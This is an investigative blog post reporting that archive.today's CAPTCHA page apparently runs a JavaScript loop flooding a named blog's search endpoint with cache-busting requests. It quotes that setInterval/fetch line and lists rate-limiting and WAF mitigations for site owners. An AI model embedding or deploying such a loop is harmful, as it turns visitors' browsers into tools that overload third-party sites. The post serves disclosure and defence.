archive.today CAPTCHA Script Sends DDoS-Level Traffic — What Site Owners Must Know

Investigation

archive.today CAPTCHA Script Sends DDoS-Level Traffic — What Site Owners Must Know

February 2026 · analysis · labels: archive.today, DDoS

TL;DR: Reported analysis shows archive.today’s CAPTCHA page running a tiny JavaScript loop that repeatedly requests a blog’s search endpoint roughly every 300 milliseconds — about three automated hits per second — causing sustained, DDoS-style traffic.

What was observed

When the archive.today CAPTCHA is opened, it reportedly executes a short client-side script that repeatedly issues `fetch()` requests to a target site while the CAPTCHA page remains open. The requests include randomized query strings to avoid caching, which keeps the target site processing fresh work for each request.

setInterval(function() { fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), { referrerPolicy: "no-referrer", mode: "no-cors" }); }, 300);

In plain language: the page sends about 3 automated searches every second to the same site while it’s open. For small blogs or resource-limited hosts, that steady flood degrades performance and can cause outages — meeting practical definitions of a DDoS event.

Why this matters

Turning visitors’ browsers into traffic generators weaponizes ordinary traffic. Even if the script was introduced with benign intent (for bot-mitigation or analytics), the effect on third-party sites can be harmful. This raises questions about archive tool design, operator responsibility, and safe fallback behavior.

Quick note: The findings and code sample were reported and documented in the original investigation; see the sources below for screenshots, timelines, and community discussion.

Immediate mitigation steps for site owners

  • Rate-limit endpoints: Add server-side throttling (return 429) on search or other high-cost routes.
  • CDN/WAF rules: Use your CDN or WAF to block high-frequency patterns or serve lightweight cached responses to suspicious queries.
  • Ignore obvious noise: Treat extremely short/random search queries as low-priority and return cheap cached payloads.
  • Log & collect evidence: Capture sample request timestamps, headers, and user-agents for abuse reports.
  • Block domains if needed: Use DNS/adblock lists selectively if a third-party domain is causing persistent harm for your site.

Community reaction & reporting

The incident prompted active discussion on community channels where users examined screenshots, code, and email timelines — debating whether the behavior was intentional and how archives should be held accountable when their tools harm other sites.

Comments